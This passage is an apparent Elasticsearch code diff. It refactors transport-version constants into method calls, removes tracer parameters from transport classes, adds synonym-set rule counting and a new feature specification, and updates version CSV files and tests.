org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.suggest.phrase.WordScorer.WordScorerFactory; @@ -123,6 +122,6 @@ public WordScorerFactory buildWordScorerFactory() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/suggest/phrase/LinearInterpolation.java b/server/src/main/java/org/elasticsearch/search/suggest/phrase/LinearInterpolation.java index 2f45b00faa992..2aac73777a321 100644 --- a/server/src/main/java/org/elasticsearch/search/suggest/phrase/LinearInterpolation.java +++ b/server/src/main/java/org/elasticsearch/search/suggest/phrase/LinearInterpolation.java @@ -13,7 +13,6 @@ import org.apache.lucene.index.Terms; import org.apache.lucene.util.BytesRef; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -180,6 +179,6 @@ public WordScorerFactory buildWordScorerFactory() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/suggest/phrase/PhraseSuggestionBuilder.java b/server/src/main/java/org/elasticsearch/search/suggest/phrase/PhraseSuggestionBuilder.java index fed2a51f799b9..8e091549bfb4f 100644 --- a/server/src/main/java/org/elasticsearch/search/suggest/phrase/PhraseSuggestionBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/suggest/phrase/PhraseSuggestionBuilder.java @@ -11,7 +11,6 @@ import org.apache.lucene.analysis.Analyzer; import org.elasticsearch.ElasticsearchParseException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -696,7 +695,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/search/suggest/phrase/StupidBackoff.java b/server/src/main/java/org/elasticsearch/search/suggest/phrase/StupidBackoff.java index ec5615a14210a..9bceaed77a4b2 100644 --- a/server/src/main/java/org/elasticsearch/search/suggest/phrase/StupidBackoff.java +++ b/server/src/main/java/org/elasticsearch/search/suggest/phrase/StupidBackoff.java @@ -13,7 +13,6 @@ import org.apache.lucene.index.Terms; import org.apache.lucene.util.BytesRef; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.suggest.phrase.WordScorer.WordScorerFactory; @@ -126,6 +125,6 @@ public WordScorerFactory buildWordScorerFactory() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/search/suggest/term/TermSuggestionBuilder.java 
b/server/src/main/java/org/elasticsearch/search/suggest/term/TermSuggestionBuilder.java index 26fc8d89f3fd1..bda9f087b40e0 100644 --- a/server/src/main/java/org/elasticsearch/search/suggest/term/TermSuggestionBuilder.java +++ b/server/src/main/java/org/elasticsearch/search/suggest/term/TermSuggestionBuilder.java @@ -17,7 +17,6 @@ import org.apache.lucene.search.spell.StringDistance; import org.elasticsearch.ElasticsearchParseException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -461,7 +460,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/main/java/org/elasticsearch/snapshots/SnapshotShardsService.java b/server/src/main/java/org/elasticsearch/snapshots/SnapshotShardsService.java index d49b670451f5b..3fd5a226936ac 100644 --- a/server/src/main/java/org/elasticsearch/snapshots/SnapshotShardsService.java +++ b/server/src/main/java/org/elasticsearch/snapshots/SnapshotShardsService.java @@ -411,6 +411,7 @@ private void startNewShardSnapshots(String localNodeId, SnapshotsInProgress.Entr entry.version(), entry.startTime() ); + snapshotStatus.updateStatusDescription("shard snapshot enqueuing to start"); startShardSnapshotTaskRunner.enqueueTask(new ActionListener<>() { @Override public void onResponse(Releasable releasable) { @@ -429,7 +430,6 @@ public void onFailure(Exception e) { assert false : wrapperException; // impossible } }); - snapshotStatus.updateStatusDescription("shard snapshot enqueued to start"); } // apply some backpressure by reserving one SNAPSHOT thread for the startup work diff --git a/test/framework/src/main/java/org/elasticsearch/entitlement/runtime/policy/TestPathLookup.java b/server/src/main/java/org/elasticsearch/synonyms/SynonymFeatures.java similarity index 51% rename from test/framework/src/main/java/org/elasticsearch/entitlement/runtime/policy/TestPathLookup.java rename to server/src/main/java/org/elasticsearch/synonyms/SynonymFeatures.java index 915f14c9d1ab8..b42143ed899a3 100644 --- a/test/framework/src/main/java/org/elasticsearch/entitlement/runtime/policy/TestPathLookup.java +++ b/server/src/main/java/org/elasticsearch/synonyms/SynonymFeatures.java @@ -7,25 +7,18 @@ * License v3.0 only", or the "Server Side Public License, v 1". 
*/ -package org.elasticsearch.entitlement.runtime.policy; +package org.elasticsearch.synonyms; -import java.nio.file.Path; -import java.util.stream.Stream; +import org.elasticsearch.features.FeatureSpecification; +import org.elasticsearch.features.NodeFeature; -public class TestPathLookup implements PathLookup { - @Override - public Path pidFile() { - return null; - } +import java.util.Set; - @Override - public Stream<Path> getBaseDirPaths(BaseDir baseDir) { - return Stream.empty(); - } +public class SynonymFeatures implements FeatureSpecification { + private static final NodeFeature RETURN_EMPTY_SYNONYM_SETS = new NodeFeature("synonyms_set.get.return_empty_synonym_sets"); @Override - public Stream<Path> resolveSettingPaths(BaseDir baseDir, String settingName) { - return Stream.empty(); + public Set<NodeFeature> getTestFeatures() { + return Set.of(RETURN_EMPTY_SYNONYM_SETS); } - }
diff --git a/server/src/main/java/org/elasticsearch/synonyms/SynonymsManagementAPIService.java b/server/src/main/java/org/elasticsearch/synonyms/SynonymsManagementAPIService.java index 70b020eb66ab5..06dce1724d392 100644 --- a/server/src/main/java/org/elasticsearch/synonyms/SynonymsManagementAPIService.java +++ b/server/src/main/java/org/elasticsearch/synonyms/SynonymsManagementAPIService.java
@@ -50,6 +50,9 @@ import org.elasticsearch.indices.SystemIndexDescriptor; import org.elasticsearch.rest.RestStatus; import org.elasticsearch.search.aggregations.BucketOrder; +import org.elasticsearch.search.aggregations.bucket.filter.Filters; +import org.elasticsearch.search.aggregations.bucket.filter.FiltersAggregationBuilder; +import org.elasticsearch.search.aggregations.bucket.filter.FiltersAggregator; import org.elasticsearch.search.aggregations.bucket.terms.Terms; import org.elasticsearch.search.aggregations.bucket.terms.TermsAggregationBuilder; import org.elasticsearch.search.builder.SearchSourceBuilder;
@@ -94,6 +97,8 @@ public class SynonymsManagementAPIService { private static final int MAX_SYNONYMS_SETS = 10_000; private static final String SYNONYM_RULE_ID_FIELD = SynonymRule.ID_FIELD.getPreferredName(); private static final String SYNONYM_SETS_AGG_NAME = "synonym_sets_aggr"; + private static final String RULE_COUNT_AGG_NAME = "rule_count"; + private static final String RULE_COUNT_FILTER_KEY = "synonym_rules"; private static final int SYNONYMS_INDEX_MAPPINGS_VERSION = 1; public static final int INDEX_SEARCHABLE_TIMEOUT_SECONDS = 30; private final int maxSynonymsSets;
@@ -185,15 +190,33 @@ private static XContentBuilder mappings() { } } + /** + * Returns all synonym sets with their rule counts, including empty synonym sets. + * @param from The index of the first synonym set to return + * @param size The number of synonym sets to return + * @param listener The listener to return the synonym sets to + */ public void getSynonymsSets(int from, int size, ActionListener<PagedResult<SynonymSetSummary>> listener) { + BoolQueryBuilder synonymSetQuery = QueryBuilders.boolQuery() + .should(QueryBuilders.termQuery(OBJECT_TYPE_FIELD, SYNONYM_SET_OBJECT_TYPE)) + .should(QueryBuilders.termQuery(OBJECT_TYPE_FIELD, SYNONYM_RULE_OBJECT_TYPE)) + .minimumShouldMatch(1); + + // Aggregation query to count only synonym rules (excluding synonym set objects) + FiltersAggregationBuilder ruleCountAggregation = new FiltersAggregationBuilder( + RULE_COUNT_AGG_NAME, + new FiltersAggregator.KeyedFilter(RULE_COUNT_FILTER_KEY, QueryBuilders.termQuery(OBJECT_TYPE_FIELD, SYNONYM_RULE_OBJECT_TYPE)) + ); + client.prepareSearch(SYNONYMS_ALIAS_NAME) .setSize(0) // Retrieves aggregated synonym rules for each synonym set, excluding the synonym set object type - .setQuery(QueryBuilders.termQuery(OBJECT_TYPE_FIELD, SYNONYM_RULE_OBJECT_TYPE)) + .setQuery(synonymSetQuery) .addAggregation( new TermsAggregationBuilder(SYNONYM_SETS_AGG_NAME).field(SYNONYMS_SET_FIELD) .order(BucketOrder.key(true)) .size(maxSynonymsSets) + .subAggregation(ruleCountAggregation) ) .setPreference(Preference.LOCAL.type()) .execute(new ActionListener<>() {
@@ -201,11 +224,11 @@ public void getSynonymsSets(int from, int size, ActionListener<PagedResult<SynonymSetSummary>> listener) { List<? extends Terms.Bucket> buckets = termsAggregation.getBuckets(); - SynonymSetSummary[] synonymSetSummaries = buckets.stream() - .skip(from) - .limit(size) - .map(bucket -> new SynonymSetSummary(bucket.getDocCount(), bucket.getKeyAsString())) - .toArray(SynonymSetSummary[]::new); + SynonymSetSummary[] synonymSetSummaries = buckets.stream().skip(from).limit(size).map(bucket -> { + Filters ruleCountFilters = bucket.getAggregations().get(RULE_COUNT_AGG_NAME); + Filters.Bucket ruleCountBucket = ruleCountFilters.getBucketByKey(RULE_COUNT_FILTER_KEY); + return new SynonymSetSummary(ruleCountBucket.getDocCount(), bucket.getKeyAsString()); + }).toArray(SynonymSetSummary[]::new); listener.onResponse(new PagedResult<>(buckets.size(), synonymSetSummaries)); }
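
Illustrative sketch (not part of the patch): the getSynonymsSets change above queries both object types and counts rules per set with a keyed filters sub-aggregation, so empty synonym sets still produce a bucket. A self-contained version of that aggregation tree; the literal field and key strings below stand in for the constants in the diff and may not match the stored values exactly:

import org.elasticsearch.index.query.QueryBuilders;
import org.elasticsearch.search.aggregations.BucketOrder;
import org.elasticsearch.search.aggregations.bucket.filter.FiltersAggregationBuilder;
import org.elasticsearch.search.aggregations.bucket.filter.FiltersAggregator;
import org.elasticsearch.search.aggregations.bucket.terms.TermsAggregationBuilder;

class SynonymSetsAggregationSketch {
    static TermsAggregationBuilder synonymSetsWithRuleCounts(int maxSynonymsSets) {
        // Count only rule documents inside each synonym-set bucket.
        FiltersAggregationBuilder ruleCount = new FiltersAggregationBuilder(
            "rule_count",
            new FiltersAggregator.KeyedFilter("synonym_rules", QueryBuilders.termQuery("object_type", "synonym_rule"))
        );
        // One bucket per synonym set; a set with no rules still yields a
        // bucket whose sub-aggregation reports a doc count of zero.
        return new TermsAggregationBuilder("synonym_sets_aggr").field("synonyms_set")
            .order(BucketOrder.key(true))
            .size(maxSynonymsSets)
            .subAggregation(ruleCount);
    }
}
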
diff --git a/server/src/main/java/org/elasticsearch/transport/InboundDecoder.java b/server/src/main/java/org/elasticsearch/transport/InboundDecoder.java index 2a9dedf89534a..c2742cf12f863 100644 --- a/server/src/main/java/org/elasticsearch/transport/InboundDecoder.java +++ b/server/src/main/java/org/elasticsearch/transport/InboundDecoder.java
@@ -11,7 +11,6 @@ import org.apache.lucene.util.BytesRef; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.bytes.BytesReference; import org.elasticsearch.common.bytes.ReleasableBytesReference; import org.elasticsearch.common.io.stream.StreamInput;
@@ -237,7 +236,7 @@ static void checkVersionCompatibility(TransportVersion remoteVersion) { "Received message from unsupported version: [" + remoteVersion.toReleaseVersion() + "] minimal compatible version is: [" - + TransportVersions.MINIMUM_COMPATIBLE.toReleaseVersion() + + TransportVersion.minimumCompatible().toReleaseVersion() + "]" ); }
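
Illustrative sketch (not part of the patch): InboundDecoder above now reads the compatibility floor from TransportVersion.minimumCompatible() instead of the TransportVersions.MINIMUM_COMPATIBLE constant. A hedged reconstruction of the guard; the exception type is a stand-in for whatever the real decoder raises:

import org.elasticsearch.TransportVersion;

class VersionGuardSketch {
    static void checkVersionCompatibility(TransportVersion remoteVersion) {
        // Reject remotes older than the minimum compatible transport version.
        if (remoteVersion.before(TransportVersion.minimumCompatible())) {
            throw new IllegalStateException(
                "Received message from unsupported version: ["
                    + remoteVersion.toReleaseVersion()
                    + "] minimal compatible version is: ["
                    + TransportVersion.minimumCompatible().toReleaseVersion()
                    + "]"
            );
        }
    }
}
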
diff --git a/server/src/main/java/org/elasticsearch/transport/OutboundHandler.java b/server/src/main/java/org/elasticsearch/transport/OutboundHandler.java index cab15fffa3fd0..5243d371ae96c 100644 --- a/server/src/main/java/org/elasticsearch/transport/OutboundHandler.java +++ b/server/src/main/java/org/elasticsearch/transport/OutboundHandler.java
@@ -433,6 +433,16 @@ private void maybeLogSlowMessage(boolean success) { } }); } catch (RuntimeException ex) { + logger.error( + Strings.format( + "unexpected exception calling sendMessage for transport message [%s] of size [%d] on [%s]", + messageDescription.get(), + messageSize, + channel + ), + ex + ); + assert Thread.currentThread().getName().startsWith("TEST-") : ex; channel.setCloseException(ex); Releasables.closeExpectNoException(() -> listener.onFailure(ex), () -> CloseableChannel.closeChannel(channel)); throw ex;
@@ -452,7 +462,7 @@ public boolean rstOnClose() { } private boolean assertValidTransportVersion(TransportVersion transportVersion) { - assert this.version.before(TransportVersions.MINIMUM_COMPATIBLE) // running an incompatible-version test + assert this.version.before(TransportVersion.minimumCompatible()) // running an incompatible-version test || this.version.onOrAfter(transportVersion) : this.version + " vs " + transportVersion; return true; }
diff --git a/server/src/main/java/org/elasticsearch/transport/RequestHandlerRegistry.java b/server/src/main/java/org/elasticsearch/transport/RequestHandlerRegistry.java index 84a8ee1b2ebbf..e6cec2a0393e0 100644 --- a/server/src/main/java/org/elasticsearch/transport/RequestHandlerRegistry.java +++ b/server/src/main/java/org/elasticsearch/transport/RequestHandlerRegistry.java
@@ -16,7 +16,6 @@ import org.elasticsearch.tasks.CancellableTask; import org.elasticsearch.tasks.Task; import org.elasticsearch.tasks.TaskManager; -import org.elasticsearch.telemetry.tracing.Tracer; import java.io.IOException; import java.lang.invoke.MethodHandles;
@@ -33,7 +32,6 @@ public class RequestHandlerRegistry<Request extends TransportRequest> implements private final boolean canTripCircuitBreaker; private final Executor executor; private final TaskManager taskManager; - private final Tracer tracer; private final Writeable.Reader<Request> requestReader; @SuppressWarnings("unused") // only accessed via #STATS_TRACKER_HANDLE, lazy initialized because instances consume non-trivial heap private TransportActionStatsTracker statsTracker;
@@ -56,8 +54,7 @@ public RequestHandlerRegistry( TransportRequestHandler<Request> handler, Executor executor, boolean forceExecution, - boolean canTripCircuitBreaker, - Tracer tracer + boolean canTripCircuitBreaker ) { this.action = action; this.requestReader = requestReader;
@@ -66,7 +63,6 @@ public RequestHandlerRegistry( this.canTripCircuitBreaker = canTripCircuitBreaker; this.executor = executor; this.taskManager = taskManager; - this.tracer = tracer; } public String getAction() {
@@ -126,8 +122,7 @@ public static RequestHandlerRegistry replaceHand handler, registry.executor, registry.forceExecution, - registry.canTripCircuitBreaker, - registry.tracer + registry.canTripCircuitBreaker ); }
diff --git a/server/src/main/java/org/elasticsearch/transport/TcpTransport.java b/server/src/main/java/org/elasticsearch/transport/TcpTransport.java index 1c7a29e4919ed..24570c544bdea 100644 --- a/server/src/main/java/org/elasticsearch/transport/TcpTransport.java +++ b/server/src/main/java/org/elasticsearch/transport/TcpTransport.java
@@ -1134,7 +1134,7 @@ public void onResponse(Void v) { nodeChannels.channels.forEach(ch -> { // Mark the channel init time ch.getChannelStats().markAccessed(relativeMillisTime); - ch.addCloseListener(new ActionListener<Void>() { + ch.addCloseListener(new ActionListener<>() { @Override public void onResponse(Void ignored) { nodeChannels.close();
@@ -1142,7 +1142,7 @@ public void onResponse(Void ignored) { @Override public void onFailure(Exception e) { - nodeChannels.closeAndFail(e);
+ nodeChannels.closeAndFail(new NodeDisconnectedException(node, "closed exceptionally: " + ch, null, e)); } }); });
diff --git a/server/src/main/java/org/elasticsearch/transport/TransportHandshaker.java b/server/src/main/java/org/elasticsearch/transport/TransportHandshaker.java index fcbadac54a89e..e26d9ac3893a2 100644 --- a/server/src/main/java/org/elasticsearch/transport/TransportHandshaker.java +++ b/server/src/main/java/org/elasticsearch/transport/TransportHandshaker.java
@@ -11,7 +11,6 @@ import org.elasticsearch.Build; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.cluster.node.DiscoveryNode; import org.elasticsearch.common.bytes.BytesReference;
@@ -232,7 +231,7 @@ private static TransportVersion ensureCompatibleVersion( return localTransportVersion; } final var bestKnownVersion = remoteTransportVersion.bestKnownVersion(); - if (bestKnownVersion.equals(TransportVersions.ZERO) == false) { + if (bestKnownVersion.equals(TransportVersion.zero()) == false) { if (bestKnownVersion.equals(remoteTransportVersion) == false) { // Remote is semantically older than us (i.e. has a lower transport protocol version), but we do not know its exact // transport protocol version so it must be chronologically newer. We recommend not doing this, it implies an upgrade
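
Illustrative sketch (not part of the patch): the TransportHandshaker hunk above uses TransportVersion.zero() as a "no known release" sentinel for bestKnownVersion(). This reading is inferred from the hunk, not from a documented contract:

import org.elasticsearch.TransportVersion;

class BestKnownVersionSketch {
    // Returns true when the remote's id maps to some release this node knows
    // about; bestKnownVersion() appears to yield zero() otherwise (assumption
    // based on the TransportHandshaker change above).
    static boolean remoteMapsToKnownRelease(TransportVersion remote) {
        return remote.bestKnownVersion().equals(TransportVersion.zero()) == false;
    }
}
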
diff --git a/server/src/main/java/org/elasticsearch/transport/TransportService.java b/server/src/main/java/org/elasticsearch/transport/TransportService.java index 7e81e72e7d457..a23a6f3367351 100644 --- a/server/src/main/java/org/elasticsearch/transport/TransportService.java +++ b/server/src/main/java/org/elasticsearch/transport/TransportService.java
@@ -48,7 +48,6 @@ import org.elasticsearch.node.ReportingService; import org.elasticsearch.tasks.Task; import org.elasticsearch.tasks.TaskManager; -import org.elasticsearch.telemetry.tracing.Tracer; import org.elasticsearch.threadpool.Scheduler; import org.elasticsearch.threadpool.ThreadPool;
@@ -134,7 +133,6 @@ protected boolean removeEldestEntry(Map.Entry eldest) { // tracer log private static final Logger tracerLog = Loggers.getLogger(logger, ".tracer"); - private final Tracer tracer; volatile String[] tracerLogInclude; volatile String[] tracerLogExclude;
@@ -206,18 +204,6 @@ public String toString() { } }; - public TransportService( - Settings settings, - Transport transport, - ThreadPool threadPool, - TransportInterceptor transportInterceptor, - Function<BoundTransportAddress, DiscoveryNode> localNodeFactory, - @Nullable ClusterSettings clusterSettings, - Set<String> taskHeaders - ) { - this(settings, transport, threadPool, transportInterceptor, localNodeFactory, clusterSettings, taskHeaders, Tracer.NOOP); - } - /** * Build the service. *
@@ -232,8 +218,7 @@ public TransportService( TransportInterceptor transportInterceptor, Function<BoundTransportAddress, DiscoveryNode> localNodeFactory, @Nullable ClusterSettings clusterSettings, - TaskManager taskManager, - Tracer tracer + TaskManager taskManager ) { this( settings,
@@ -243,8 +228,7 @@ public TransportService( localNodeFactory, clusterSettings, new ClusterConnectionManager(settings, transport, threadPool.getThreadContext()), - taskManager, - tracer + taskManager ); }
@@ -256,8 +240,7 @@ public TransportService( TransportInterceptor transportInterceptor, Function<BoundTransportAddress, DiscoveryNode> localNodeFactory, @Nullable ClusterSettings clusterSettings, - Set<String> taskHeaders, - Tracer tracer + Set<String> taskHeaders ) { this( settings,
@@ -267,8 +250,7 @@ public TransportService( localNodeFactory, clusterSettings, new ClusterConnectionManager(settings, transport, threadPool.getThreadContext()), - new TaskManager(settings, threadPool, taskHeaders), - tracer + new TaskManager(settings, threadPool, taskHeaders) ); }
@@ -281,15 +263,13 @@ public TransportService( Function<BoundTransportAddress, DiscoveryNode> localNodeFactory, @Nullable ClusterSettings clusterSettings, ConnectionManager connectionManager, - TaskManager taskManger, - Tracer tracer + TaskManager taskManger ) { this.transport = transport; transport.setSlowLogThreshold(TransportSettings.SLOW_OPERATION_THRESHOLD_SETTING.get(settings)); this.threadPool = threadPool; this.localNodeFactory = localNodeFactory; this.connectionManager = connectionManager; - this.tracer = tracer; this.clusterName = ClusterName.CLUSTER_NAME_SETTING.get(settings); setTracerLogInclude(TransportSettings.TRACE_LOG_INCLUDE_SETTING.get(settings)); setTracerLogExclude(TransportSettings.TRACE_LOG_EXCLUDE_SETTING.get(settings));
@@ -1214,8 +1194,7 @@ public void registerRequestHandler( handler, executor, false, - true, - tracer + true ); transport.registerRequestHandler(reg); }
@@ -1247,8 +1226,7 @@ public void registerRequestHandler( handler, executor, forceExecution, - canTripCircuitBreaker, - tracer + canTripCircuitBreaker ); transport.registerRequestHandler(reg); }
diff --git a/server/src/main/resources/META-INF/services/org.elasticsearch.features.FeatureSpecification b/server/src/main/resources/META-INF/services/org.elasticsearch.features.FeatureSpecification index 14749330f09da..4cc2e658e798d 100644 --- a/server/src/main/resources/META-INF/services/org.elasticsearch.features.FeatureSpecification +++ b/server/src/main/resources/META-INF/services/org.elasticsearch.features.FeatureSpecification
@@ -14,6 +14,7 @@ org.elasticsearch.rest.action.admin.cluster.GetSnapshotsFeatures org.elasticsearch.index.IndexFeatures org.elasticsearch.index.mapper.MapperFeatures org.elasticsearch.search.SearchFeatures +org.elasticsearch.synonyms.SynonymFeatures org.elasticsearch.search.retriever.RetrieversFeatures org.elasticsearch.script.ScriptFeatures org.elasticsearch.cluster.routing.RoutingFeatures
diff --git a/server/src/main/resources/org/elasticsearch/TransportVersions.csv b/server/src/main/resources/org/elasticsearch/TransportVersions.csv index 58c5afa760383..c613d6f41c9fb 100644 --- a/server/src/main/resources/org/elasticsearch/TransportVersions.csv +++ b/server/src/main/resources/org/elasticsearch/TransportVersions.csv
@@ -149,11 +149,27 @@ 8.17.6,8797006 8.17.7,8797007 8.17.8,8797008 +8.17.9,8797009 +8.17.10,8797010 8.18.0,8840002 8.18.1,8840003 8.18.2,8840004 8.18.3,8840005 +8.18.4,8840006 +8.18.5,8840007 +8.18.6,8840008 +8.19.0,8841064 +8.19.1,8841065 +8.19.2,8841066 +8.19.3,8841067 9.0.0,9000009 9.0.1,9000010 9.0.2,9000011 9.0.3,9000012 +9.0.4,9000013 +9.0.5,9000014
+9.0.6,9000015 +9.1.0,9112003 +9.1.1,9112004 +9.1.2,9112005 +9.1.3,9112006 diff --git a/server/src/main/resources/org/elasticsearch/index/IndexVersions.csv b/server/src/main/resources/org/elasticsearch/index/IndexVersions.csv index 058080bb5725a..fa5475e847067 100644 --- a/server/src/main/resources/org/elasticsearch/index/IndexVersions.csv +++ b/server/src/main/resources/org/elasticsearch/index/IndexVersions.csv @@ -149,11 +149,27 @@ 8.17.6,8521000 8.17.7,8521000 8.17.8,8521000 +8.17.9,8521000 +8.17.10,8521000 8.18.0,8525000 8.18.1,8525000 8.18.2,8525000 8.18.3,8525000 +8.18.4,8525000 +8.18.5,8525000 +8.18.6,8525000 +8.19.0,8536000 +8.19.1,8536000 +8.19.2,8536000 +8.19.3,8536000 9.0.0,9009000 9.0.1,9009000 9.0.2,9009000 9.0.3,9009000 +9.0.4,9009000 +9.0.5,9009000 +9.0.6,9009000 +9.1.0,9033000 +9.1.1,9033000 +9.1.2,9033000 +9.1.3,9033000 diff --git a/server/src/main/resources/transport/constants/minimum_ccs_version.csv b/server/src/main/resources/transport/constants/minimum_ccs_version.csv new file mode 100644 index 0000000000000..d5a7a223b3bb5 --- /dev/null +++ b/server/src/main/resources/transport/constants/minimum_ccs_version.csv @@ -0,0 +1 @@ +9000012 diff --git a/server/src/main/resources/transport/constants/minimum_compatible.csv b/server/src/main/resources/transport/constants/minimum_compatible.csv new file mode 100644 index 0000000000000..16c1a5e6cdf1d --- /dev/null +++ b/server/src/main/resources/transport/constants/minimum_compatible.csv @@ -0,0 +1 @@ +8841000 diff --git a/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_8_18_5.csv b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_8_18_5.csv new file mode 100644 index 0000000000000..a22b09457dfb3 --- /dev/null +++ b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_8_18_5.csv @@ -0,0 +1 @@ +8840007 diff --git a/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_8_18_6.csv b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_8_18_6.csv new file mode 100644 index 0000000000000..0ff8fc01e91e4 --- /dev/null +++ b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_8_18_6.csv @@ -0,0 +1 @@ +8840008 diff --git a/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_8_19_3.csv b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_8_19_3.csv new file mode 100644 index 0000000000000..20882a00fd857 --- /dev/null +++ b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_8_19_3.csv @@ -0,0 +1 @@ +8841067 diff --git a/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_9_0_5.csv b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_9_0_5.csv new file mode 100644 index 0000000000000..4615ee4f02e0e --- /dev/null +++ b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_9_0_5.csv @@ -0,0 +1 @@ +9000014 diff --git a/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_9_0_6.csv b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_9_0_6.csv new file mode 100644 index 0000000000000..9cbaf3dd8c2b0 --- /dev/null +++ b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_9_0_6.csv @@ -0,0 +1 @@ +9000015 diff --git 
a/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_9_1_3.csv b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_9_1_3.csv new file mode 100644 index 0000000000000..9cba3c528df76 --- /dev/null +++ b/server/src/main/resources/transport/definitions/unreferable/initial_elasticsearch_9_1_3.csv @@ -0,0 +1 @@ +9112006 diff --git a/server/src/main/resources/transport/upper_bounds/8.18.csv b/server/src/main/resources/transport/upper_bounds/8.18.csv new file mode 100644 index 0000000000000..4eb5140004ea6 --- /dev/null +++ b/server/src/main/resources/transport/upper_bounds/8.18.csv @@ -0,0 +1 @@ +initial_elasticsearch_8_18_6,8840008 diff --git a/server/src/main/resources/transport/upper_bounds/8.19.csv b/server/src/main/resources/transport/upper_bounds/8.19.csv new file mode 100644 index 0000000000000..476468b203875 --- /dev/null +++ b/server/src/main/resources/transport/upper_bounds/8.19.csv @@ -0,0 +1 @@ +initial_elasticsearch_8_19_3,8841067 diff --git a/server/src/main/resources/transport/upper_bounds/9.0.csv b/server/src/main/resources/transport/upper_bounds/9.0.csv new file mode 100644 index 0000000000000..f8f50cc6d7839 --- /dev/null +++ b/server/src/main/resources/transport/upper_bounds/9.0.csv @@ -0,0 +1 @@ +initial_elasticsearch_9_0_6,9000015 diff --git a/server/src/main/resources/transport/upper_bounds/9.1.csv b/server/src/main/resources/transport/upper_bounds/9.1.csv new file mode 100644 index 0000000000000..079475f1a2f66 --- /dev/null +++ b/server/src/main/resources/transport/upper_bounds/9.1.csv @@ -0,0 +1 @@ +initial_elasticsearch_9_1_3,9112006 diff --git a/server/src/test/java/org/elasticsearch/ExceptionSerializationTests.java b/server/src/test/java/org/elasticsearch/ExceptionSerializationTests.java index bfa897173a368..dba50a794a780 100644 --- a/server/src/test/java/org/elasticsearch/ExceptionSerializationTests.java +++ b/server/src/test/java/org/elasticsearch/ExceptionSerializationTests.java @@ -217,7 +217,9 @@ public FileVisitResult postVisitDirectory(Path dir, IOException exc) { }; Files.walkFileTree(startPath, visitor); - final Path testStartPath = PathUtils.get(ExceptionSerializationTests.class.getResource(path).toURI()); + final Path testStartPath = PathUtils.get( + ElasticsearchExceptionTests.class.getProtectionDomain().getCodeSource().getLocation().toURI() + ).resolve("org").resolve("elasticsearch"); Files.walkFileTree(testStartPath, visitor); assertTrue(notRegistered.remove(TestException.class)); assertTrue(notRegistered.remove(UnknownHeaderException.class)); diff --git a/server/src/test/java/org/elasticsearch/TransportVersionTests.java b/server/src/test/java/org/elasticsearch/TransportVersionTests.java index 9b02b66583e78..761ae19dbad7d 100644 --- a/server/src/test/java/org/elasticsearch/TransportVersionTests.java +++ b/server/src/test/java/org/elasticsearch/TransportVersionTests.java @@ -12,7 +12,12 @@ import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.TransportVersionUtils; +import java.io.BufferedReader; +import java.io.ByteArrayInputStream; +import java.io.InputStreamReader; import java.lang.reflect.Modifier; +import java.nio.charset.StandardCharsets; +import java.util.List; import java.util.Set; import java.util.regex.Matcher; import java.util.regex.Pattern; @@ -169,7 +174,7 @@ public void testIsPatchFrom() { } public void testVersionConstantPresent() { - Set<TransportVersion> ignore = Set.of(TransportVersions.ZERO, TransportVersion.current(), TransportVersions.MINIMUM_COMPATIBLE); + Set<TransportVersion> ignore =
